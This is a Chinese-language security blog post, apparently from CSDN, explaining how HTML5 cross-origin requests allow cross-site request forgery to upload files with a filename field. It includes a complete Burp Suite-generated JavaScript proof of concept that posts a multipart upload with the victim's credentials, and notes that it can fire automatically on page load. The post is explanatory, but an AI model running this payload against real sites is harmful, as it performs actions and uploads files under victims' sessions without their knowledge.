利用csrf漏洞上传文件

最新推荐文章于 2024-03-13 13:35:06 发布
最新推荐文章于 2024-03-13 13:35:06 发布
阅读量1k 收藏 1
点赞数
分类专栏: # 信安文章

大家都知道通常用csrf来上传一个文件不是很简单的.问题在于我们创建的假的表单提交的数据跟浏览器文件上传提交的数据有一点不同.那就是上传的请求会有一个filename的参数:

-----------------------------256672629917035
Content-Disposition: form-data; name="file"; filename="test2.txt"
Content-Type: text/plain          
test3
-----------------------------256672629917035

如果我们创建一个表单,提交如上的请求是没法成功添加filename参数的,这是因为filename参数是文件上传的input自动生成。这就阻止了邪恶的黑客通过csrf上传文件。不过自从有了html5,一切都不一样了。

html5有一个新特性叫跨域资源共享(CORS  http://www.w3.org/TR/cors/).在过去,由于同源策略的影响,黑客没办法通过javascript去访问别的域.考虑到XSS这么泛滥,同源策略真的是让我们的生活更安全了.不过,利用html5的跨域资源共享,可以让javascript来发送有filename属性的合法的跨域请求。这样只要用户访问了恶意页面,不需要其他的交互,就可以通过csrf来上传文件了。

下面是一个Burp Suite生成的poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://example.com/new_file.html", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"message\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"backPage\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"dataType\"\r\n" +
          "\r\n" +
          "test  \r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "test3\r\n" +
          "-----------------------------256672629917035--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="submit" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

当然,poc里的提交按钮不是必须的,可以通过javascript自动提交。从某种程度上来说浏览器的最重要的同源策略被突破了。这真是令人忧伤的一件事情。

扩展阅读:

http://blog.kotowicz.net/2011/05/cross-domain-arbitrary-file-upload.html

http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html 

https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS?redirectlocale=en-US&redirectslug=HTTP_access_control

http://www.w3.org/TR/cors/

FLy_鹏程万里
关注
专栏目录
Java Web 应用的安全攻防之 CSRF 漏洞分析
AI天才研究院
10-09 824
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“one-click attack”或者Session riding,其利用网站对用户浏览器的信任,通过伪装成用户正常操作的动作,达到恶意盗取用户信息、执行违规操作等目的,是一种常用的Web应用安全漏洞CSRF在很多Web应用中都存在着严重的隐患,攻击者可以盗用用户的登录信息、Cookie等,进而冒充用户进行各种恶意操作。因此,保护用户的个人信息安全、系统安全应首要考虑。
CSRF漏洞剖析
zmzsg100的专栏
12-04 892
CSRF的前世今生
文件上传、CSRF漏洞的简单介绍
weixin_55837124的博客
06-24 338
文件上传漏洞的原理 Web应用程序通常会文件上传的功能, 例如在 BBS发布图片 ,在个人网站发布ZIP压缩 包,在办公平台发布DOC文件等 , 只要Web应用程序允许上传文件,就有可能存在文件上传漏 洞。 文件上传漏洞的危害 导致网站甚至整个服务器被控制,恶意的脚本文件又称为WebShell,WebShell具有强大的功能,如查看服务器目录、执行系统命令等。 文件上传漏洞利用 1.上传Web脚本程序,Web容器解释执行上传的恶意脚本。 2...
HTML5 下利用 csrf 上传文件
dengzhaoqun的专栏
01-05 1596
看到这篇文章: 利用 csrf 漏洞上传文件 . Q1: 怎样构造一个实际有效的例子; Q2: 怎样检测这种漏洞; 直接将文中的 payload 写入一个 html 文件, 用浏览器加载, 并没有成功发送带有文件内容的 request . 个人使用 Chrome, 支持 HTML5. 将含有 payload 的 html 文件从本地转到
CSRF原理介绍及文件上传
weixin_45735361的博客
02-27 671
CSRF原理介绍 CSRF漏洞定义 CSRF(cross-site request forery,跨站请求伪造),也被称为one click attack或者session riding,通过缩写为CSRF或者XSRF XSS与CSRF区别 1.XSS利用站点内的信任用户,盗取cookie 2.CSRF通过伪装成受信任用户请求信任的网站 CSRF漏洞原理 利用目标用户的合法身份,以目标...
【Dvwa】-CSRF+文件包含+文件上传
share something here
03-26 239
CSRFLow代码分析漏洞高级利用MediumHigh CSRF,全称 Cross- site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息( cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盜取cookie而是直接利用 Low代码分析 <?php #看是否提交了
文件上传及CSRF+Selfxss
qq_57686163的博客
08-15 1172
文件上传案例和CSRF+selfXSS演示
CSRF漏洞
qq_39416206的博客
03-14 819
知识点: CSRF原理: CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会绝点是这是真正的用户操作而去运行。 这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 其实可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事
CSRF漏洞原理与防御方式
dreamthe的博客
09-17 2083
CSRF漏洞原理 CSRF被叫做跨站请求伪造,该怎么理解这句话呢,比如 用户a在浏览器登录了账号,当他发送登录请求时候,服务器验证了账号密码,会返回给一个身份信息存放在cookie里面,浏览器保存,那么以后用户访问服务器带着这个cookie就行了。那么怎么产生攻击的呢,是用户在已经登录的状态下,访问了一个恶意的网站,带浏览器保存的cookie值向服务器发送了恶意请求,服务器会以为是用户的请求,其实这是用户不知情的请求。垮了两个站,一个是用户登录实际网站,一个屙屎攻击者恶意构造网站,所以称作跨站请求伪造。
csrf ajax和fileupload
jaesonchen
05-11 224
&lt;!-- &lt;csrf disabled="true"/&gt;关闭csrf保护,spring建议所有request都应该使用csrf保护,默认是开启的 --&gt; &lt;!-- &lt;input type="hidden" name="${_csrf.parameterName}" value="${_csrf.token}"/&gt; --&amp
tornado 进阶(csrf文件上传)
日上フブキのブログ
08-27 150
csrf settings = { "xsrf_cookies": True, } application = tornado.web.Application([ (r"/", MainHandler), (r"/login", LoginHandler), ], **settings) <form action="/new_message" me...
PHP代码审计入门-文件上传漏洞CSRF简单分析
身高两米不到的博客
11-03 198
0x00 写在前面从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。本章为代码审计入门学习第四篇,根据案例进行审计分析。0x01 文件上传漏洞文件上传之前写过一篇有关靶场的文章,原理就不写了,主要学习一下代码层面。靶场已经搭建完成,用户登陆后可以修改头像,发现定义好的upFile(
CSRF漏洞总结
m0_62805300的博客
07-08 842
攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 3. 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站
ctfhub ssrf之上传文件
最新发布
L_2448570135的博客
03-13 572
CTFHUB之ssrf中文件上传的题目内容,记录自己遇到的问题
ssrf redis getshell 写私钥_csrf和ssrf总结
weixin_39850697的博客
11-22 472
1.csrf跨站请求伪造CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。在没有关闭相关网页的情况下,点击其他人发来的CSRF链接,利用客户端的cookie直接向服务器发送请求。原理:攻击者通过盗用用户身份悄悄发送一个请求,或执...
web安全之文件上传漏洞攻击与防范方法
热门推荐
u014609111的博客
09-29 5万+
一、 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞利用技术门槛非常的低,对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞利用无限扩大。大多数的上传漏洞利用后攻击者都会留下
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值